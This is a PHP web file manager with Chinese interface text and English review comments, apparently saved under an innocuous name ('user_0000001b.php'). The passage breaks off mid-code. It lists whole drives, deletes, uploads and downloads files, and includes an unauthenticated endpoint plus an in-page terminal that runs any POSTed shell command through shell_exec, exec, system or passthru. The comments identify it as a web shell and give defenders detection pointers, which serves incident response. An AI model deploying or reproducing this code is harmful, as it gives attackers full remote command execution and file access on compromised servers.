查看文件: user_0000001b.php
大小: 71.22 KB
类型: application/octet-stream
<?php
// Browser-based file manager that also accepts a shell command over POST and
// runs it on the host (see the `terminal_command` handler further down).
// NOTE(review): no login, token or CSRF check is visible in this part of the
// file; session_start() only opens a session, which the visible code uses to
// remember copy/cut state. An unauthenticated script with these capabilities
// is what incident responders classify as a web shell: unless the site owner
// deployed it deliberately, its presence on a server indicates compromise.
session_start();

// Error reporting: only fatal errors are reported (warnings are hidden), and
// display_errors = 1 sends those messages to the client.
error_reporting(E_ERROR);
ini_set('display_errors', 1);

// Roots accepted by the path check (isValidPath). Keys are paths, values are
// the labels shown in the UI. The Windows entries are whole drives, so where
// they resolve the "allow list" spans the entire volume.
$allowedDisks = [
    'C:' => 'C盘',
    'D:' => 'D盘',
    'E:' => 'E盘',
    // Add more disks here...
];

// Also allow the web server's document root.
$allowedDisks[$_SERVER['DOCUMENT_ROOT']] = '网站根目录';

/**
 * Encrypt $data with AES-256-CBC under a fresh IV and return base64(IV || ciphertext).
 *
 * NOTE(review): CBC without a MAC gives confidentiality only; nothing here
 * detects a modified token. The return values of openssl_random_pseudo_bytes()
 * and openssl_encrypt() are not checked for failure.
 *
 * @param string $data Plaintext (in this file: a filesystem path).
 * @param string $key  Key string handed to OpenSSL as-is.
 * @return string Base64 text; differs on every call because the IV is random.
 */
function aesEncrypt($data, $key) {
    $method = 'AES-256-CBC';
    $ivSize = openssl_cipher_iv_length($method);
    $iv = openssl_random_pseudo_bytes($ivSize);
    $encrypted = openssl_encrypt($data, $method, $key, OPENSSL_RAW_DATA, $iv);
    return base64_encode($iv . $encrypted);
}

/**
 * Reverse of aesEncrypt(): base64-decode, split off the leading IV, decrypt the rest.
 *
 * @param string $data Base64 token in the layout aesEncrypt() produces.
 * @param string $key  Same key string that was used for encryption.
 * @return string|false Plaintext, or false when OpenSSL rejects the input.
 */
function aesDecrypt($data, $key) {
    $method = 'AES-256-CBC';
    $data = base64_decode($data);
    $ivSize = openssl_cipher_iv_length($method);
    $iv = substr($data, 0, $ivSize);
    $data = substr($data, $ivSize);
    return openssl_decrypt($data, $method, $key, OPENSSL_RAW_DATA, $iv);
}

/**
 * Return 32 hex characters built from 16 random bytes.
 * Not called anywhere in the visible part of the file.
 *
 * @return string
 */
function generateAesKey() {
    return bin2hex(openssl_random_pseudo_bytes(16));
}

/**
 * Check access to a path (the original note says "directory", but any existing
 * path is accepted because the existence test is file_exists()).
 *
 * @param string $path Path to test.
 * @param string $mode 'r' for readable, 'w' for writable; anything else yields false.
 * @return bool False when the path does not exist or the check fails.
 */
function hasDirectoryPermission($path, $mode = 'r') {
    if (! file_exists($path)) {
        return false;
    }
    // Drop cached stat data for this path so the answer reflects the current state.
    clearstatcache(true, $path);
    if ($mode === 'r') {
        return is_readable($path);
    } elseif ($mode === 'w') {
        return is_writable($path);
    }
    return false;
}

/**
 * List a directory without raising warnings.
 *
 * @param string $path Directory to list.
 * @return array Entries from scandir() (including '.' and '..'), or [] when the
 *               path is unreadable or scandir() fails.
 */
function safeScandir($path) {
    if (! hasDirectoryPermission($path, 'r')) {
        return [];
    }
    // '@' suppresses the warning; failure is reported through the empty array.
    $result = @scandir($path);
    return $result === false ? [] : $result;
}

/**
 * Read a whole file without raising warnings.
 *
 * @param string $path File to read.
 * @return string|false Contents, or false when the path is unreadable, is not a
 *                      regular file, or the read fails.
 */
function safeFileGetContents($path) {
    if (! hasDirectoryPermission($path, 'r') || ! is_file($path)) {
        return false;
    }
    return @file_get_contents($path);
}

// Key for the encrypted `path` / `old_path` / `source_path` request parameters.
// NOTE(review): this is a hard-coded placeholder literal, so anyone holding a
// copy of the script can read or forge these tokens; the encryption hides
// paths from casual view but is not an access control. The literal is 28
// bytes, shorter than the 32 that AES-256 expects; PHP's OpenSSL binding pads
// short keys with NUL bytes. For responders: the same key turns the base64
// `path=` values found in web access logs back into the paths that were touched.
$encryptionKey = "your-secret-aes-key-32-chars";

// Routing parameters with defaults. The isset()/!empty() ternaries stand in for
// the null-coalescing operator (the original note calls this a fix for it).
// $c is assigned but not read in the visible part of the file.
$a = isset($_GET['a']) && ! empty($_GET['a']) ? $_GET['a'] : 'index';
$b = isset($_GET['b']) && ! empty($_GET['b']) ? $_GET['b'] : 'list';
$c = isset($_GET['c']) && ! empty($_GET['c']) ? $_GET['c'] : 'index';

// Resolve the starting directory: an encrypted `path` parameter must decrypt
// and pass isValidPath(), otherwise the request is terminated. isValidPath()
// is declared further down; PHP makes top-level functions available before
// their declaration is reached.
if (isset($_GET['path']) && ! empty($_GET['path'])) {
    $encryptedPath = $_GET['path'];
    $decryptedPath = aesDecrypt($encryptedPath, $encryptionKey);
    if ($decryptedPath && isValidPath($decryptedPath)) {
        $path = $decryptedPath;
    } else {
        die("非法路径访问!");
    }
} else {
    // Default to the web server's document root.
    $path = $_SERVER['DOCUMENT_ROOT'];
}

/**
 * Decide whether $path lies under one of the roots in $allowedDisks.
 * (Original note: path validation changed to support multiple disks.)
 *
 * NOTE(review): the test is a plain string-prefix match on realpath() output
 * with no trailing separator, so a sibling whose name merely starts with an
 * allowed root's name also passes. Because realpath() is used, a path that
 * does not exist is rejected.
 *
 * @param string $path Candidate path.
 * @return bool True when the canonical path starts with a canonical allowed root.
 */
function isValidPath($path) {
    global $allowedDisks;
    // Canonicalise the candidate; a path that cannot be resolved is invalid.
    $realPath = realpath($path);
    if ($realPath === false) {
        return false;
    }
    // Accept on the first allowed root that is a prefix of the canonical path.
    foreach ($allowedDisks as $disk => $name) {
        $realDisk = realpath($disk);
        if ($realDisk !== false && strpos($realPath, $realDisk) === 0) {
            return true;
        }
    }
    return false;
}

/**
 * Render a byte count as GB / MB / KB (1024-based, two decimals) or as a plain
 * number followed by the byte label.
 *
 * @param int|float $fileSize Byte count (callers in this file pass filesize()).
 * @return string
 */
function formatSize($fileSize) {
    if ($fileSize >= 1073741824) {
        return round($fileSize / 1073741824, 2) . ' GB';
    } elseif ($fileSize >= 1048576) {
        return round($fileSize / 1048576, 2) . ' MB';
    } elseif ($fileSize >= 1024) {
        return round($fileSize / 1024, 2) . ' KB';
    } else {
        return $fileSize . ' 字节';
    }
}

/**
 * Thin wrapper around dirname().
 *
 * @param string $path
 * @return string
 */
function getParentDirectory($path) {
    return dirname($path);
}

/**
 * Delete a file, or a directory together with everything below it.
 *
 * NOTE(review): results of the nested deletions are ignored; only the final
 * rmdir() decides the return value. is_dir() follows symbolic links, so a
 * link to a directory is descended into rather than removed as a link.
 *
 * @param string $dir File or directory to remove.
 * @return bool True when the path was already absent or removal succeeded.
 */
function deleteDirectory($dir) {
    if (! file_exists($dir)) {
        return true;
    }
    if (! is_dir($dir)) {
        return unlink($dir);
    }
    $items = safeScandir($dir);
    foreach ($items as $item) {
        if ($item != '.' && $item != '..') {
            $path = $dir . DIRECTORY_SEPARATOR . $item;
            if (is_dir($path)) {
                deleteDirectory($path);
            } else {
                @unlink($path);
            }
        }
    }
    return @rmdir($dir);
}

/**
 * Rename a file or directory in place (same parent directory).
 *
 * The source must exist and its canonical path must start with the canonical
 * base directory; the new name may not contain path separators or the
 * characters : * ? " < > | and must not already exist in that directory.
 *
 * @param string      $oldPath Existing path.
 * @param string      $newName New base name.
 * @param string|null $baseDir Confinement root; defaults to the document root.
 * @return string The new full path.
 * @throws Exception With a message naming the failed check or the failed rename.
 */
function safeRename($oldPath, $newName, $baseDir = null) {
    $baseDir = $baseDir !== null ? $baseDir : $_SERVER['DOCUMENT_ROOT'];
    // Normalise both separator styles to the platform separator.
    $oldPath = str_replace(['/', '\\'], DIRECTORY_SEPARATOR, $oldPath);
    $baseDir = str_replace(['/', '\\'], DIRECTORY_SEPARATOR, $baseDir);
    $realOldPath = realpath($oldPath);
    if ($realOldPath === false) {
        throw new Exception("原路径不存在");
    }
    // Same prefix-style confinement test as isValidPath(), against $baseDir only.
    if (strpos($realOldPath, realpath($baseDir)) !== 0) {
        throw new Exception("不允许操作该路径");
    }
    if (preg_match('/[\/\\\\:\*\?"<>\|]/', $newName)) {
        throw new Exception("文件名包含非法字符");
    }
    $dir = dirname($realOldPath);
    $newPath = $dir . DIRECTORY_SEPARATOR . $newName;
    if (file_exists($newPath)) {
        throw new Exception("目标名称已存在");
    }
    if (! @rename($realOldPath, $newPath)) {
        throw new Exception("重命名操作失败");
    }
    return $newPath;
}

/**
 * Recursively add the contents of $folder to an open archive.
 *
 * @param object $zip      Archive object offering addEmptyDir() and addFile()
 *                         (presumably a ZipArchive; confirm at the call site).
 * @param string $folder   Directory on disk to add.
 * @param string $baseName Path prefix inside the archive; '' for the archive root.
 * @return void
 * @throws Exception When $folder is not readable. Unreadable files are skipped silently.
 */
function addFolderToZip($zip, $folder, $baseName = '') {
    if (! hasDirectoryPermission($folder, 'r')) {
        throw new Exception("没有读取目录权限: " . $folder);
    }
    $items = safeScandir($folder);
    foreach ($items as $item) {
        if ($item != '.' && $item != '..') {
            $fullPath = $folder . DIRECTORY_SEPARATOR . $item;
            // Archive-internal names always use '/' regardless of platform.
            $localPath = $baseName ? $baseName . '/' . $item : $item;
            if (is_dir($fullPath)) {
                $zip->addEmptyDir($localPath);
                addFolderToZip($zip, $fullPath, $localPath);
            } else {
                if (is_readable($fullPath)) {
                    $zip->addFile($fullPath, $localPath);
                }
            }
        }
    }
}

/**
 * Recursively copy a directory tree.
 *
 * @param string $src Source directory.
 * @param string $dst Destination directory; created (mode 0755, recursive) if absent.
 * @return bool False as soon as a mkdir() or copy() fails; true otherwise.
 * @throws Exception When the source is unreadable or the destination's parent is not writable.
 */
function copyDirectory($src, $dst) {
    if (! hasDirectoryPermission($src, 'r')) {
        throw new Exception("没有读取源目录权限: " . $src);
    }
    if (! hasDirectoryPermission(dirname($dst), 'w')) {
        throw new Exception("没有写入目标目录权限: " . dirname($dst));
    }
    if (! file_exists($dst)) {
        if (! @mkdir($dst, 0755, true)) {
            return false;
        }
    }
    $items = safeScandir($src);
    foreach ($items as $item) {
        if ($item != '.' && $item != '..') {
            $srcFile = $src . DIRECTORY_SEPARATOR . $item;
            $dstFile = $dst . DIRECTORY_SEPARATOR . $item;
            if (is_dir($srcFile)) {
                if (! copyDirectory($srcFile, $dstFile)) {
                    return false;
                }
            } else {
                if (! @copy($srcFile, $dstFile)) {
                    return false;
                }
            }
        }
    }
    return true;
}

/**
 * Recursively search a directory for $keyword, case-insensitively, in entry
 * names and in the contents of files whose extension isTextFile() accepts.
 *
 * NOTE(review): a text file that matches by name and by content is reported
 * twice, and every candidate text file is read into memory in full.
 *
 * @param string $directory Directory to search.
 * @param string $keyword   Text to look for.
 * @return array List of ['path' => ..., 'size' => ..., 'is_dir' => ...] entries;
 *               empty when the directory is not readable.
 */
function searchFiles($directory, $keyword) {
    if (! hasDirectoryPermission($directory, 'r')) {
        return []; // No permission: return an empty result.
    }
    $results = [];
    $items = safeScandir($directory);
    foreach ($items as $item) {
        if ($item == '.' || $item == '..') {
            continue;
        }
        $path = $directory . DIRECTORY_SEPARATOR . $item;
        $isDir = is_dir($path);
        // Match on the entry name.
        if (stripos($item, $keyword) !== false) {
            $results[] = [
                'path' => $path,
                'size' => filesize($path),
                'is_dir' => $isDir,
            ];
        }
        // Descend into subdirectories.
        if ($isDir) {
            $results = array_merge($results, searchFiles($path, $keyword));
        }
        // Match on file contents for recognised text extensions.
        if (! $isDir && isTextFile($path) && is_readable($path)) {
            $content = safeFileGetContents($path);
            if ($content !== false && stripos($content, $keyword) !== false) {
                $results[] = [
                    'path' => $path,
                    'size' => filesize($path),
                    'is_dir' => false,
                ];
            }
        }
    }
    return $results;
}

/**
 * Determine a MIME type: fileinfo first, then mime_content_type(), then a
 * built-in extension table.
 *
 * @param string $filePath File to inspect.
 * @return string|false MIME type; 'application/octet-stream' for unreadable files
 *                      and unknown extensions. The fileinfo/mime_content_type
 *                      branches return whatever those functions return.
 */
function getMimeType($filePath) {
    if (! is_readable($filePath)) {
        return 'application/octet-stream';
    }
    if (function_exists('finfo_file')) {
        $finfo = finfo_open(FILEINFO_MIME_TYPE);
        $mime = finfo_file($finfo, $filePath);
        finfo_close($finfo);
        return $mime;
    } elseif (function_exists('mime_content_type')) {
        return mime_content_type($filePath);
    } else {
        // Last resort: guess from the lower-cased file extension.
        $extension = strtolower(pathinfo($filePath, PATHINFO_EXTENSION));
        $mimeMap = [
            'jpg' => 'image/jpeg',
            'jpeg' => 'image/jpeg',
            'png' => 'image/png',
            'gif' => 'image/gif',
            'bmp' => 'image/bmp',
            'webp' => 'image/webp',
            'pdf' => 'application/pdf',
            'txt' => 'text/plain',
            'html' => 'text/html',
            'htm' => 'text/html',
            'css' => 'text/css',
            'js' => 'application/javascript',
            'json' => 'application/json',
            'xml' => 'application/xml',
            'zip' => 'application/zip',
            'mp3' => 'audio/mpeg',
            'mp4' => 'video/mp4',
            'avi' => 'video/x-msvideo',
        ];
        return isset($mimeMap[$extension]) ? $mimeMap[$extension] : 'application/octet-stream';
    }
}

/**
 * Tell whether an extension (without the dot, any case) is in the image list.
 *
 * @param string $extension
 * @return bool
 */
function isImageFile($extension) {
    $imageExtensions = ['jpg', 'jpeg', 'png', 'gif', 'bmp', 'webp', 'svg'];
    return in_array(strtolower($extension), $imageExtensions);
}

/**
 * Tell whether a path's extension is in the text list. Only the extension is
 * examined; the file contents are not.
 *
 * @param string $filePath
 * @return bool
 */
function isTextFile($filePath) {
    $textExtensions = ['txt', 'php', 'html', 'css', 'js', 'json', 'xml', 'md'];
    $extension = strtolower(pathinfo($filePath, PATHINFO_EXTENSION));
    return in_array($extension, $textExtensions);
}

// POST handling: a POSTed `b` overrides the action chosen from the query string.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['b'])) {
    $b = $_POST['b'];
} else {
    $b = isset($_GET['b']) && ! empty($_GET['b']) ? $_GET['b'] : 'list';
}

// Command execution endpoint (the original note reads "fixed terminal command
// handling logic"). Any request carrying a `terminal_command` POST field is
// handled here, ahead of the $a/$b routing.
// NOTE(review): the field is passed to the shell verbatim, and `current_path`
// goes to chdir() without isValidPath(), so the allow list above does not
// constrain this handler. No authentication or CSRF check is visible.
// Pointers for defenders: POST bodies containing `terminal_command=` and
// `current_path=`; a PHP worker process spawning a shell; with all four
// functions tried below listed in php.ini `disable_functions`, this handler
// can only answer with its "not allowed" error.
if (isset($_POST['terminal_command'])) {
    $command = $_POST['terminal_command'];
    $current_path = isset($_POST['current_path']) ? $_POST['current_path'] : $path;
    $result = '';
    $output = [];
    $return_var = 0;
    try {
        // Reject an empty command (empty() also treats the string "0" as empty).
        if (empty(trim($command))) {
            throw new Exception("命令不能为空");
        }
        // Change into the requested directory, with an error check. When the
        // directory is missing or unreadable the chdir is skipped without error.
        if (is_dir($current_path) && is_readable($current_path)) {
            if (!chdir($current_path)) {
                throw new Exception("无法切换到目录: " . $current_path);
            }
        }
        // Use whichever execution function is available, in this order:
        // shell_exec, exec, system, passthru. ' 2>&1' folds stderr into the
        // captured output. Only the first available function runs.
        $executed = false;
        if (function_exists('shell_exec')) {
            // $output is reused here for shell_exec()'s return value.
            $output = shell_exec($command . ' 2>&1');
            $result = $output !== null ? $output : "命令执行完成,无输出";
            $executed = true;
        }
        if (!$executed && function_exists('exec')) {
            exec($command . ' 2>&1', $output, $return_var);
            $result = implode("\n", $output);
            if ($return_var !== 0) {
                $result .= "\n命令退出代码: " . $return_var;
            }
            $executed = true;
        }
        if (!$executed && function_exists('system')) {
            // system() prints directly, so its output is captured via a buffer.
            ob_start();
            system($command . ' 2>&1', $return_var);
            $result = ob_get_clean();
            if ($return_var !== 0) {
                $result .= "\n命令退出代码: " . $return_var;
            }
            $executed = true;
        }
        if (!$executed && function_exists('passthru')) {
            ob_start();
            passthru($command . ' 2>&1', $return_var);
            $result = ob_get_clean();
            if ($return_var !== 0) {
                $result .= "\n命令退出代码: " . $return_var;
            }
            $executed = true;
        }
        if (!$executed) {
            throw new Exception("错误: 服务器配置不允许执行系统命令");
        }
        // Read back the working directory (the author expects the command may
        // have changed it).
        $new_path = getcwd();
        if ($new_path === false) {
            $new_path = $current_path; // Fall back to the requested path when getcwd() fails.
        }
    } catch (Exception $e) {
        $result = "执行错误: " . $e->getMessage();
        $new_path = $current_path;
    }
    // JSON reply: command output, working directory, and the exception message
    // when one was caught. The statement continues past this point in the file.
    echo json_encode([
        'output' => $result,
        'path' => $new_path,
        'error' => isset($e) ?
$e->getMessage() : null ]); exit; } // 添加CSS样式 echo '<style> body { font-family: Arial, sans-serif; margin: 20px; } table { border-collapse: collapse; width: 100%; margin-top: 15px; } th, td { border: 1px solid #ddd; padding: 8px; text-align: left; } th { background-color: #f2f2f2; } .error { color: red; padding: 10px; border: 1px solid red; margin: 10px 0; } .success { color: green; padding: 10px; border: 1px solid green; margin: 10px 0; } .btn { padding: 5px 10px; margin: 2px; cursor: pointer; } .permission-denied { color: #888; font-style: italic; } .disk-list { margin-bottom: 20px; padding: 10px; background: #f5f5f5; border-radius: 5px; } .disk-item { display: inline-block; margin-right: 15px; } </style>'; // 主逻辑 switch ($a) { case 'index': switch ($b) { case 'list': // 显示磁盘选择 echo '<div class="disk-list"><strong>磁盘选择:</strong> '; foreach ($allowedDisks as $disk => $name) { $realDisk = realpath($disk); if ($realDisk !== false) { $encryptedDiskPath = aesEncrypt($realDisk, $encryptionKey); echo '<span class="disk-item"><a href="?a=index&b=list&path=' . urlencode($encryptedDiskPath) . '">' . htmlspecialchars($name) . '</a></span>'; } } echo '</div>'; // 检查目录读取权限 if (! hasDirectoryPermission($path, 'r')) { echo '<div class="error">'; echo '错误: 没有读取目录权限: ' . htmlspecialchars($path); echo '</div>'; // 尝试返回上一级 $parentPath = getParentDirectory($path); if (isValidPath($parentPath) && hasDirectoryPermission($parentPath, 'r')) { $encryptedParentPath = aesEncrypt($parentPath, $encryptionKey); echo '<a href="?a=index&b=list&path=' . urlencode($encryptedParentPath) . '">返回上一级</a>'; } else { // 返回默认目录(网站根目录) $encryptedRoot = aesEncrypt($_SERVER['DOCUMENT_ROOT'], $encryptionKey); echo '<a href="?a=index&b=list&path=' . urlencode($encryptedRoot) . 
'">返回根目录</a>'; } break; } try { $files = safeScandir($path); if (empty($files)) { throw new Exception("无法读取目录内容或目录为空"); } $parentPath = getParentDirectory($path); $encryptedParentPath = aesEncrypt($parentPath, $encryptionKey); echo '<h2>当前目录: ' . htmlspecialchars($path) . '</h2>'; echo '<a href="?a=index&b=list&path=' . urlencode($encryptedParentPath) . '">返回上一级</a>'; echo ' <div class="actions"> <button type="button" onclick="showCreateFileForm()" class="btn">新建文件</button> <button type="button" onclick="showCreateFolderForm()" class="btn">新建文件夹</button> <button type="button" onclick="showUploadForm()" class="btn">上传文件</button> <button type="button" onclick="showSearchForm()" class="btn">搜索</button> </div>'; echo ' <div id="createFileForm" style="display:none; margin:10px 0; padding:10px; border:1px solid #ccc;"> <form method="get"> <input type="hidden" name="a" value="index"> <input type="hidden" name="b" value="create_file"> <input type="hidden" name="path" value="' . htmlspecialchars(aesEncrypt($path, $encryptionKey)) . '"> <label>文件名: <input type="text" name="filename" required></label> <button type="submit">创建</button> <button type="button" onclick="hideCreateFileForm()">取消</button> </form> </div>'; echo '<div id="createFolderForm" style="display:none; margin:10px 0; padding:10px; border:1px solid #ccc;"> <form method="get"> <input type="hidden" name="a" value="index"> <input type="hidden" name="b" value="create_folder"> <input type="hidden" name="path" value="' . htmlspecialchars(aesEncrypt($path, $encryptionKey)) . 
'"> <label>文件夹名: <input type="text" name="foldername" required></label> <button type="submit">创建</button> <button type="button" onclick="hideCreateFolderForm()">取消</button> </form> </div>'; echo '<div id="uploadForm" style="display:none; margin:10px 0; padding:10px; border:1px solid #ccc;"> <form method="post" enctype="multipart/form-data"> <input type="hidden" name="a" value="index"> <input type="hidden" name="b" value="upload"> <input type="hidden" name="path" value="' . htmlspecialchars($path) . '"> <label>选择文件: <input type="file" name="upload_file" required></label> <button type="submit">上传</button> <button type="button" onclick="hideUploadForm()">取消</button> </form> </div>'; echo '<div id="searchForm" style="display:none; margin:10px 0; padding:10px; border:1px solid #ccc;"> <form method="get"> <input type="hidden" name="a" value="index"> <input type="hidden" name="b" value="search"> <input type="hidden" name="path" value="' . htmlspecialchars(aesEncrypt($path, $encryptionKey)) . '"> <label>搜索: <input type="text" name="keyword" required></label> <button type="submit">搜索</button> <button type="button" onclick="hideSearchForm()">取消</button> </form> </div>'; // 终端HTML结构 echo ' <div id="terminal-container" style="display:none; position:fixed; bottom:0; left:0; right:0; background:#000; color:#fff; padding:10px; z-index:1000; height:300px; overflow-y:auto;"> <div style="display:flex; justify-content:space-between; margin-bottom:10px;"> <strong>终端</strong> <button onclick="toggleTerminal()" style="background:#ff4444; color:white; border:none; padding:2px 8px;">关闭</button> </div> <div id="terminal-output" style="font-family:monospace; margin-bottom:10px; white-space:pre-wrap; height:220px; overflow-y:auto;"></div> <div style="display:flex;"> <span style="color:#0f0;" id="terminal-prompt">$ </span> <input type="text" id="terminal-input" style="flex-grow:1; background:#000; color:#0f0; border:none; outline:none; font-family:monospace; margin-left:5px;" 
autocomplete="off"> </div> </div>'; echo '<button type="button" onclick="toggleTerminal()" class="btn" style="position:fixed; bottom:10px; right:10px; z-index:1001;">打开终端</button>'; echo '<script> function showCreateFileForm() { document.getElementById("createFileForm").style.display = "block"; } function hideCreateFileForm() { document.getElementById("createFileForm").style.display = "none"; } function showCreateFolderForm() { document.getElementById("createFolderForm").style.display = "block"; } function hideCreateFolderForm() { document.getElementById("createFolderForm").style.display = "none"; } function showUploadForm() { document.getElementById("uploadForm").style.display = "block"; } function hideUploadForm() { document.getElementById("uploadForm").style.display = "none"; } function showSearchForm() { document.getElementById("searchForm").style.display = "block"; } function hideSearchForm() { document.getElementById("searchForm").style.display = "none"; } </script>'; // 终端JavaScript代码 echo ' <script> let currentTerminalPath = "' . addslashes($path) . 
'"; function toggleTerminal() { const terminal = document.getElementById("terminal-container"); if (terminal.style.display === "none") { terminal.style.display = "block"; document.getElementById("terminal-input").focus(); } else { terminal.style.display = "none"; } } function executeCommand(command) { const outputElement = document.getElementById("terminal-output"); const promptElement = document.getElementById("terminal-prompt"); const inputElement = document.getElementById("terminal-input"); // 显示执行的命令(带路径) outputElement.innerHTML += "<span style=\"color:#0ff;\">" + currentTerminalPath + " $ " + command + "</span>\n"; // 禁用输入框防止重复提交 inputElement.disabled = true; // 发送AJAX请求 const xhr = new XMLHttpRequest(); xhr.open("POST", "", true); xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xhr.onreadystatechange = function() { if (xhr.readyState === 4) { // 重新启用输入框 inputElement.disabled = false; inputElement.focus(); if (xhr.status === 200) { try { const response = JSON.parse(xhr.responseText); // 添加输出结果 if (response.output) { outputElement.innerHTML += response.output + "\n"; } // 更新当前路径 if (response.path && response.path !== currentTerminalPath) { currentTerminalPath = response.path; promptElement.textContent = response.path + " $ "; } // 滚动到底部 outputElement.scrollTop = outputElement.scrollHeight; } catch (e) { outputElement.innerHTML += "错误: 无法解析服务器响应\n"; outputElement.scrollTop = outputElement.scrollHeight; } } else { outputElement.innerHTML += "错误: 请求失败 (状态码: " + xhr.status + ")\n"; outputElement.scrollTop = outputElement.scrollHeight; } } }; xhr.onerror = function() { inputElement.disabled = false; inputElement.focus(); outputElement.innerHTML += "错误: 网络请求失败\n"; outputElement.scrollTop = outputElement.scrollHeight; }; xhr.send("terminal_command=" + encodeURIComponent(command) + "¤t_path=" + encodeURIComponent(currentTerminalPath)); } // 终端输入处理 document.getElementById("terminal-input").addEventListener("keydown", function(e) { if (e.key 
=== "Enter") { const command = this.value.trim(); if (command) { executeCommand(command); this.value = ""; } e.preventDefault(); } else if (e.key === "ArrowUp") { // 历史记录功能可以在这里实现 e.preventDefault(); } }); // 初始化终端提示符 document.getElementById("terminal-prompt").textContent = currentTerminalPath + " $ "; </script>'; // 显示剪切/复制状态 if (isset($_SESSION['copy_source']) && file_exists($_SESSION['copy_source'])) { $operationType = isset($_SESSION['operation_type']) ? $_SESSION['operation_type'] : ''; $fileName = basename($_SESSION['copy_source']); $operationText = ($operationType === 'cut') ? '剪切' : '复制'; echo '<div style="background: #ffeaa7; padding: 10px; margin: 10px 0;">'; echo '<strong>待' . $operationText . '的项目:</strong> ' . htmlspecialchars($fileName); echo ' <button type="button" style="margin-left:10px;">'; echo '<a href="?a=index&b=paste&path=' . urlencode(aesEncrypt($path, $encryptionKey)) . '" style="text-decoration:none;color:inherit;">粘贴</a>'; echo '</button>'; echo ' <button type="button" style="margin-left:5px;">'; echo '<a href="?a=index&b=cancel_cut&path=' . urlencode(aesEncrypt($path, $encryptionKey)) . '" style="text-decoration:none;color:inherit;">取消操作</a>'; echo '</button>'; echo '</div>'; } echo '<table>'; echo '<tr><th>文件名</th><th>大小</th><th>类型</th><th>权限</th><th>操作</th></tr>'; foreach ($files as $file) { if ($file == '.' || $file == '..') { continue; } $file = preg_replace('/[\x00-\x1F\x7F]/', '', $file); $filePath = $path . DIRECTORY_SEPARATOR . $file; // 检查文件权限 $isReadable = is_readable($filePath); $isWritable = is_writable($filePath); $fileSize = '无权限访问'; $fileType = '未知'; if ($isReadable) { $fileSize = is_dir($filePath) ? '-' : formatSize(filesize($filePath)); $fileType = is_dir($filePath) ? '文件夹' : '文件'; } // 权限显示 $permissionInfo = ''; $permissionInfo .= $isReadable ? '读 ' : ''; $permissionInfo .= $isWritable ? 
'写 ' : ''; if (empty($permissionInfo)) { $permissionInfo = '无权限'; } echo '<tr>'; echo '<td>'; if (is_dir($filePath) && $isReadable) { $encryptedPath = aesEncrypt($filePath, $encryptionKey); echo '<a href="?a=index&b=list&path=' . urlencode($encryptedPath) . '">' . htmlspecialchars($file) . '</a>'; } else { echo htmlspecialchars($file); if (! $isReadable) { echo ' <span class="permission-denied">(无权限)</span>'; } } echo '</td>'; echo '<td>' . $fileSize . '</td>'; echo '<td>' . $fileType . '</td>'; echo '<td>' . $permissionInfo . '</td>'; echo '<td>'; if ($isReadable) { echo '<button type="button"><a href="?a=index&b=ck&path=' . urlencode(aesEncrypt($filePath, $encryptionKey)) . '" style="text-decoration:none;color:inherit;">查看</a></button>'; } if ($isWritable) { echo '<button type="button" onclick="if(confirm(\'确定要删除 ' . htmlspecialchars($file) . ' 吗?\')){window.location.href=\'?a=index&b=sc&path=' . urlencode(aesEncrypt($filePath, $encryptionKey)) . '\'}">删除</button>'; echo '<form method="get" style="display:inline;"> <input type="hidden" name="a" value="index"> <input type="hidden" name="b" value="rename_form"> <input type="hidden" name="old_path" value="' . htmlspecialchars(urlencode(aesEncrypt($filePath, $encryptionKey))) . '"> <button type="submit">重命名</button> </form>'; } if ($isReadable && ! is_dir($filePath)) { echo '<button type="button"><a href="?a=index&b=xz&path=' . urlencode(aesEncrypt($filePath, $encryptionKey)) . '" style="text-decoration:none;color:inherit;">下载</a></button>'; echo '<button type="button"><a href="?a=index&b=ys&path=' . urlencode(aesEncrypt($filePath, $encryptionKey)) . '" style="text-decoration:none;color:inherit;">压缩</a></button>'; } if ($isReadable) { echo '<form method="get" style="display:inline;"> <input type="hidden" name="a" value="index"> <input type="hidden" name="b" value="copy"> <input type="hidden" name="source_path" value="' . urlencode(aesEncrypt($filePath, $encryptionKey)) . 
'"> <button type="submit" onclick="return confirm(\'确定要复制 ' . htmlspecialchars($file) . ' 吗?\')">复制</button> </form>'; echo '<form method="get" style="display:inline;"> <input type="hidden" name="a" value="index"> <input type="hidden" name="b" value="cut"> <input type="hidden" name="source_path" value="' . urlencode(aesEncrypt($filePath, $encryptionKey)) . '"> <button type="submit">剪切</button> </form>'; } echo '</td>'; echo '</tr>'; } echo '</table>'; } catch (Exception $e) { echo '<div class="error">错误: ' . htmlspecialchars($e->getMessage()) . '</div>'; } break; case 'ck': $encryptedPath = $_GET['path']; $path = aesDecrypt($encryptedPath, $encryptionKey); if (! isValidPath($path)) { die("非法路径!"); } if (! is_readable($path)) { echo '<div class="error">错误: 没有读取文件权限</div>'; $parentPath = dirname($path); $encryptedParentPath = aesEncrypt($parentPath, $encryptionKey); echo '<a href="?a=index&b=list&path=' . urlencode($encryptedParentPath) . '">返回</a>'; break; } $parentPath = dirname($path); $encryptedParentPath = aesEncrypt($parentPath, $encryptionKey); if (is_file($path)) { $fileName = basename($path); $fileSize = formatSize(filesize($path)); $fileMime = getMimeType($path); $fileExtension = strtolower(pathinfo($path, PATHINFO_EXTENSION)); echo '<h2>查看文件: ' . htmlspecialchars($fileName) . '</h2>'; echo '<p>大小: ' . $fileSize . '</p>'; echo '<p>类型: ' . $fileMime . '</p>'; if (isImageFile($fileExtension)) { echo '<div style="margin:20px 0;">'; echo '<img src="?a=index&b=preview_image&path=' . urlencode($encryptedPath) . '" style="max-width:100%; max-height:600px; border:1px solid #ccc;">'; echo '</div>'; } elseif (isTextFile($path)) { $content = safeFileGetContents($path); if ($content === false) { echo '<div class="error">无法读取文件内容</div>'; } else { echo '<form method="post" action="?a=index&b=save_edit">'; echo '<input type="hidden" name="path" value="' . htmlspecialchars($encryptedPath) . 
